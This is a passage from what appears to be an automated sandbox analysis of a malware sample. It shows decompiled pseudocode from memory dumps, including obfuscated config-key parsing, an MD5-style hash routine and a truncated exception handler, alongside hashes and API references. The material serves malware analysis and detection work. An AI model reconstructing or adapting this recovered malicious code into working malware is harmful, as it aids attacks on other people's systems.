				int _t7;
				int _t12;

				_t7 = E012041D4(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E012013CC(_a4);
				}
				return _t12;
			}





                                                        0x012069a3
                                                        0x012069a8
                                                        0x012069ac
                                                        0x012069b3
                                                        0x012069be
                                                        0x012069c2
                                                        0x012069c2
                                                        0x012069cb

                                                        APIs
                                                          • Part of subcall function 012041D4: memcpy.NTDLL(00000000,00000110,0120517B,0120517B,?,?,0120517B,?,?,012052EA,?), ref: 0120420A
                                                          • Part of subcall function 012041D4: memset.NTDLL ref: 01204280
                                                          • Part of subcall function 012041D4: memset.NTDLL ref: 01204294
                                                        • memcpy.NTDLL(0120517B,0120517B,00000000,0120517B,0120517B,0120517B,?,?,012052EA,?,?,0120517B,?), ref: 012069B3
                                                          • Part of subcall function 012013CC: RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: memcpymemset$FreeHeap
                                                        • String ID:
                                                        • API String ID: 3053036209-0
                                                        • Opcode ID: 13af1243c0b10fe6991d438999edb1d00b27d356b3e8aba016f0faff810b262d
                                                        • Instruction ID: eb83057281acbc2bfdc61d965d7280043cf81695d4dde2e5ea93ff82e2ceecb9
                                                        • Opcode Fuzzy Hash: 13af1243c0b10fe6991d438999edb1d00b27d356b3e8aba016f0faff810b262d
                                                        • Instruction Fuzzy Hash: C0E08C7650012AB6CB136A98DC00EFFBF5C8F626A0F004121FF088A242D631D660A7E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 0120725F, Relevance: 12.2, APIs: 8, Instructions: 225memoryCOMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E0120725F(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				signed int _t59;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t67;
				signed int _t71;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				signed int _t87;
				void* _t92;
				intOrPtr _t109;

				_t93 = __ecx;
				_t28 =  *0x120a2d0; // 0x69b25f44
				if(E01206BB2( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x120a324 = _v8;
				}
				_t33 =  *0x120a2d0; // 0x69b25f44
				if(E01206BB2( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L57:
					return _v12;
				}
				_t39 =  *0x120a2d0; // 0x69b25f44
				if(E01206BB2( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L55:
					HeapFree( *0x120a290, 0, _v16);
					goto L57;
				} else {
					_t92 = _v12;
					if(_t92 == 0) {
						_t45 = 0;
					} else {
						_t87 =  *0x120a2d0; // 0x69b25f44
						_t45 = E01202C90(_t93, _t92, _t87 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x120a298 = _v8;
						}
					}
					if(_t92 == 0) {
						_t46 = 0;
					} else {
						_t83 =  *0x120a2d0; // 0x69b25f44
						_t46 = E01202C90(_t93, _t92, _t83 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x120a29c = _v8;
						}
					}
					if(_t92 == 0) {
						_t47 = 0;
					} else {
						_t79 =  *0x120a2d0; // 0x69b25f44
						_t47 = E01202C90(_t93, _t92, _t79 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x120a2a0 = _v8;
						}
					}
					if(_t92 == 0) {
						_t48 = 0;
					} else {
						_t75 =  *0x120a2d0; // 0x69b25f44
						_t48 = E01202C90(_t93, _t92, _t75 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x120a004 = _v8;
						}
					}
					if(_t92 == 0) {
						_t49 = 0;
					} else {
						_t71 =  *0x120a2d0; // 0x69b25f44
						_t49 = E01202C90(_t93, _t92, _t71 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x120a02c = _v8;
						}
					}
					if(_t92 == 0) {
						_t50 = 0;
					} else {
						_t67 =  *0x120a2d0; // 0x69b25f44
						_t50 = E01202C90(_t93, _t92, _t67 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x120a2a4 = 5;
						goto L42;
					} else {
						_t93 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t92 == 0) {
								_t51 = 0;
							} else {
								_t64 =  *0x120a2d0; // 0x69b25f44
								_t51 = E01202C90(_t93, _t92, _t64 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t61 = 0x10;
								_t62 = E01205BBA(_t61);
								if(_t62 != 0) {
									_push(_t62);
									E0120152E();
								}
							}
							if(_t92 == 0) {
								_t52 = 0;
							} else {
								_t59 =  *0x120a2d0; // 0x69b25f44
								_t52 = E01202C90(_t93, _t92, _t59 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E01205BBA(0, _t52) != 0) {
								_t109 =  *0x120a37c; // 0x5769630
								E01204013(_t109 + 4, _t57);
							}
							_t53 =  *0x120a2d4; // 0x455d5a8
							_t22 = _t53 + 0x120b2d2; // 0x576887a
							_t23 = _t53 + 0x120b7c4; // 0x6976612e
							 *0x120a320 = _t22;
							 *0x120a390 = _t23;
							HeapFree( *0x120a290, 0, _t92);
							_v12 = 0;
							goto L55;
						}
					}
				}
			}































                                                        0x0120725f
                                                        0x01207262
                                                        0x01207282
                                                        0x01207290
                                                        0x01207290
                                                        0x01207295
                                                        0x012072af
                                                        0x012074bc
                                                        0x012074c3
                                                        0x012074ca
                                                        0x012074ca
                                                        0x012072b5
                                                        0x012072d1
                                                        0x012074aa
                                                        0x012074b4
                                                        0x00000000
                                                        0x012072d7
                                                        0x012072d7
                                                        0x012072dc
                                                        0x012072f2
                                                        0x012072de
                                                        0x012072de
                                                        0x012072eb
                                                        0x012072eb
                                                        0x012072fc
                                                        0x012072fe
                                                        0x01207308
                                                        0x0120730d
                                                        0x0120730d
                                                        0x01207308
                                                        0x01207314
                                                        0x0120732a
                                                        0x01207316
                                                        0x01207316
                                                        0x01207323
                                                        0x01207323
                                                        0x0120732e
                                                        0x01207330
                                                        0x0120733a
                                                        0x0120733f
                                                        0x0120733f
                                                        0x0120733a
                                                        0x01207346
                                                        0x0120735c
                                                        0x01207348
                                                        0x01207348
                                                        0x01207355
                                                        0x01207355
                                                        0x01207360
                                                        0x01207362
                                                        0x0120736c
                                                        0x01207371
                                                        0x01207371
                                                        0x0120736c
                                                        0x01207378
                                                        0x0120738e
                                                        0x0120737a
                                                        0x0120737a
                                                        0x01207387
                                                        0x01207387
                                                        0x01207392
                                                        0x01207394
                                                        0x0120739e
                                                        0x012073a3
                                                        0x012073a3
                                                        0x0120739e
                                                        0x012073aa
                                                        0x012073c0
                                                        0x012073ac
                                                        0x012073ac
                                                        0x012073b9
                                                        0x012073b9
                                                        0x012073c4
                                                        0x012073c6
                                                        0x012073d0
                                                        0x012073d5
                                                        0x012073d5
                                                        0x012073d0
                                                        0x012073dc
                                                        0x012073f2
                                                        0x012073de
                                                        0x012073de
                                                        0x012073eb
                                                        0x012073eb
                                                        0x012073f6
                                                        0x01207409
                                                        0x01207409
                                                        0x00000000
                                                        0x012073f8
                                                        0x012073f8
                                                        0x01207402
                                                        0x00000000
                                                        0x01207413
                                                        0x01207413
                                                        0x01207415
                                                        0x0120742b
                                                        0x01207417
                                                        0x01207417
                                                        0x01207424
                                                        0x01207424
                                                        0x0120742f
                                                        0x01207431
                                                        0x01207434
                                                        0x01207435
                                                        0x0120743c
                                                        0x0120743e
                                                        0x0120743f
                                                        0x0120743f
                                                        0x0120743c
                                                        0x01207446
                                                        0x0120745c
                                                        0x01207448
                                                        0x01207448
                                                        0x01207455
                                                        0x01207455
                                                        0x01207460
                                                        0x0120746e
                                                        0x01207478
                                                        0x01207478
                                                        0x0120747d
                                                        0x01207483
                                                        0x01207490
                                                        0x01207496
                                                        0x0120749c
                                                        0x012074a1
                                                        0x012074a7
                                                        0x00000000
                                                        0x012074a7
                                                        0x01207402
                                                        0x012073f6

                                                        APIs
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 01207304
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 01207336
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 01207368
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 0120739A
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 012073CC
                                                        • StrToIntExA.SHLWAPI(00000000,00000000,01204540,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 012073FE
                                                        • HeapFree.KERNEL32(00000000,?,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 012074A1
                                                        • HeapFree.KERNEL32(00000000,?,?,01204540,69B25F44,?,?,69B25F44,01204540,?,69B25F44,E8FA7DD7,0120A00C,7742C740), ref: 012074B4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: a3466c314cf49e4d2a374c3f04e71e1ffe2a6c071c0a92e08ed1de60c2153fb7
                                                        • Instruction ID: cfad5607fb632480d243a59a5f8e9ab44c92b75ad71297062501eaeb974b2300
                                                        • Opcode Fuzzy Hash: a3466c314cf49e4d2a374c3f04e71e1ffe2a6c071c0a92e08ed1de60c2153fb7
                                                        • Instruction Fuzzy Hash: D9719870A20216EFE723DBB8DC8DD6F7BB9FB48700B540B65A641D7187E671E9008B20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01201754, Relevance: 1.9, APIs: 1, Instructions: 610COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 50%
                                                        			E01201754(void* __ecx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t231;
				signed int _t233;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				signed int _t245;
				signed int _t247;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t274;
				signed int _t337;
				void* _t347;
				signed int _t348;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t375;
				signed int _t377;
				signed int _t379;
				signed int _t381;
				signed int _t383;
				intOrPtr* _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t417;
				signed int _t419;
				signed int _t421;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				signed int _t437;
				signed int _t439;
				signed int _t441;
				signed int _t443;
				signed int _t445;
				void* _t447;
				signed int _t507;
				signed int _t598;
				signed int _t606;
				signed int _t612;
				signed int _t678;
				signed int* _t681;
				signed int _t682;
				signed int _t684;
				signed int _t689;
				signed int _t691;
				signed int _t696;
				signed int _t698;
				signed int _t717;
				signed int _t719;
				signed int _t721;
				signed int _t723;
				signed int _t725;
				signed int _t727;
				signed int _t733;
				signed int _t739;
				signed int _t741;
				signed int _t743;
				signed int _t745;
				signed int _t747;

				_t226 = _a4;
				_t347 = __ecx + 2;
				_t681 =  &_v76;
				_t447 = 0x10;
				do {
					_t274 =  *(_t347 - 1) & 0x000000ff;
					_t347 = _t347 + 4;
					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
					_t681 =  &(_t681[1]);
					_t447 = _t447 - 1;
				} while (_t447 != 0);
				_t6 = _t226 + 4; // 0x14eb3fc3
				_t682 =  *_t6;
				_t7 = _t226 + 8; // 0x8d08458b
				_t407 =  *_t7;
				_t8 = _t226 + 0xc; // 0x56c1184c
				_t348 =  *_t8;
				asm("rol eax, 0x7");
				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
				asm("rol ecx, 0xc");
				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
				asm("ror edx, 0xf");
				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
				asm("ror esi, 0xa");
				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
				_v8 = _t684;
				_t689 = _v8;
				asm("rol eax, 0x7");
				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
				asm("rol ecx, 0xc");
				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
				asm("ror edx, 0xf");
				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
				asm("ror esi, 0xa");
				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
				_v8 = _t691;
				_t696 = _v8;
				asm("rol eax, 0x7");
				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
				asm("rol ecx, 0xc");
				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
				asm("ror edx, 0xf");
				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
				asm("ror esi, 0xa");
				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
				_v8 = _t698;
				asm("rol eax, 0x7");
				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
				asm("rol ecx, 0xc");
				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
				_t507 =  !_t356;
				asm("ror edx, 0xf");
				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
				_v12 = _t415;
				_v12 =  !_v12;
				asm("ror esi, 0xa");
				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
				asm("rol eax, 0x5");
				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
				asm("rol ecx, 0x9");
				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
				asm("rol edx, 0xe");
				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
				asm("ror esi, 0xc");
				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
				asm("rol eax, 0x5");
				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
				asm("rol ecx, 0x9");
				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
				asm("rol edx, 0xe");
				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
				asm("ror esi, 0xc");
				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
				asm("rol eax, 0x5");
				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
				asm("rol ecx, 0x9");
				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
				asm("rol edx, 0xe");
				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
				asm("ror esi, 0xc");
				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
				asm("rol eax, 0x5");
				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
				asm("rol ecx, 0x9");
				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
				asm("rol edx, 0xe");
				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
				asm("ror esi, 0xc");
				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
				asm("rol eax, 0x4");
				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
				asm("rol ecx, 0xb");
				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
				asm("rol edx, 0x10");
				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
				_t598 = _t366 ^ _t425;
				asm("ror esi, 0x9");
				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
				asm("rol eax, 0x4");
				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
				asm("rol edi, 0xb");
				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
				asm("rol edx, 0x10");
				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
				_t337 = _t606 ^ _t427;
				asm("ror ecx, 0x9");
				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
				asm("rol eax, 0x4");
				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
				asm("rol esi, 0xb");
				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
				asm("rol edi, 0x10");
				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
				_t429 = _t733 ^ _t612;
				asm("ror ecx, 0x9");
				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
				asm("rol eax, 0x4");
				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
				asm("rol edx, 0xb");
				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
				asm("rol esi, 0x10");
				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
				asm("ror ecx, 0x9");
				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
				asm("rol eax, 0x6");
				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
				asm("rol edx, 0xa");
				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
				asm("rol esi, 0xf");
				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
				asm("ror ecx, 0xb");
				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
				asm("rol eax, 0x6");
				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
				asm("rol edx, 0xa");
				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
				asm("rol esi, 0xf");
				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
				asm("ror ecx, 0xb");
				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
				asm("rol eax, 0x6");
				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
				asm("rol edx, 0xa");
				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
				asm("rol esi, 0xf");
				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}



































































































                                                        0x01201757
                                                        0x01201762
                                                        0x01201765
                                                        0x01201768
                                                        0x01201769
                                                        0x01201769
                                                        0x01201774
                                                        0x01201785
                                                        0x01201787
                                                        0x0120178a
                                                        0x0120178a
                                                        0x0120178d
                                                        0x0120178d
                                                        0x01201790
                                                        0x01201790
                                                        0x01201793
                                                        0x01201793
                                                        0x012017b0
                                                        0x012017b3
                                                        0x012017c9
                                                        0x012017cc
                                                        0x012017e6
                                                        0x012017e9
                                                        0x012017ff
                                                        0x01201802
                                                        0x01201804
                                                        0x0120181c
                                                        0x0120181f
                                                        0x01201822
                                                        0x0120183a
                                                        0x0120183d
                                                        0x01201857
                                                        0x0120185a
                                                        0x01201870
                                                        0x01201873
                                                        0x01201875
                                                        0x0120188d
                                                        0x01201892
                                                        0x01201895
                                                        0x012018ab
                                                        0x012018ae
                                                        0x012018c8
                                                        0x012018cb
                                                        0x012018e1
                                                        0x012018e4
                                                        0x012018e6
                                                        0x01201901
                                                        0x01201904
                                                        0x0120191b
                                                        0x0120191e
                                                        0x01201922
                                                        0x0120193b
                                                        0x0120193e
                                                        0x01201940
                                                        0x01201943
                                                        0x0120195e
                                                        0x01201961
                                                        0x0120197a
                                                        0x0120197d
                                                        0x0120198d
                                                        0x01201990
                                                        0x012019a8
                                                        0x012019ab
                                                        0x012019c5
                                                        0x012019c8
                                                        0x012019e0
                                                        0x012019e3
                                                        0x012019f9
                                                        0x012019fc
                                                        0x01201a14
                                                        0x01201a17
                                                        0x01201a2f
                                                        0x01201a32
                                                        0x01201a4c
                                                        0x01201a4f
                                                        0x01201a65
                                                        0x01201a68
                                                        0x01201a80
                                                        0x01201a83
                                                        0x01201a9d
                                                        0x01201aa0
                                                        0x01201ab8
                                                        0x01201abb
                                                        0x01201ad1
                                                        0x01201ad4
                                                        0x01201aec
                                                        0x01201aef
                                                        0x01201b07
                                                        0x01201b0a
                                                        0x01201b1c
                                                        0x01201b1f
                                                        0x01201b31
                                                        0x01201b34
                                                        0x01201b46
                                                        0x01201b49
                                                        0x01201b4d
                                                        0x01201b5d
                                                        0x01201b60
                                                        0x01201b6e
                                                        0x01201b71
                                                        0x01201b83
                                                        0x01201b86
                                                        0x01201b9a
                                                        0x01201b9d
                                                        0x01201b9f
                                                        0x01201baf
                                                        0x01201bb2
                                                        0x01201bc4
                                                        0x01201bc7
                                                        0x01201bd5
                                                        0x01201bd8
                                                        0x01201bea
                                                        0x01201bed
                                                        0x01201bf1
                                                        0x01201c01
                                                        0x01201c04
                                                        0x01201c16
                                                        0x01201c19
                                                        0x01201c27
                                                        0x01201c2a
                                                        0x01201c3c
                                                        0x01201c3f
                                                        0x01201c51
                                                        0x01201c54
                                                        0x01201c68
                                                        0x01201c6b
                                                        0x01201c7f
                                                        0x01201c82
                                                        0x01201c96
                                                        0x01201c99
                                                        0x01201cad
                                                        0x01201cb0
                                                        0x01201cc4
                                                        0x01201cc7
                                                        0x01201cdb
                                                        0x01201ce0
                                                        0x01201cf2
                                                        0x01201cf5
                                                        0x01201d09
                                                        0x01201d0c
                                                        0x01201d20
                                                        0x01201d23
                                                        0x01201d39
                                                        0x01201d3c
                                                        0x01201d50
                                                        0x01201d53
                                                        0x01201d65
                                                        0x01201d68
                                                        0x01201d7c
                                                        0x01201d7f
                                                        0x01201d93
                                                        0x01201d96
                                                        0x01201daa
                                                        0x01201db3
                                                        0x01201db6
                                                        0x01201dbf
                                                        0x01201dc8
                                                        0x01201dd0
                                                        0x01201dd8
                                                        0x01201de2
                                                        0x01201df7

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: memset
                                                        • String ID:
                                                        • API String ID: 2221118986-0
                                                        • Opcode ID: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
                                                        • Instruction ID: 6a3d12c70212685d94de078feb7460879e6a9d6aadc8d32a7263fa05e9c85a6e
                                                        • Opcode Fuzzy Hash: fa325bdafb3c154772591fba5ceccab0c0e74e448f976aa4e7506c66901bd3b1
                                                        • Instruction Fuzzy Hash: B522847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01208055, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01208055(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
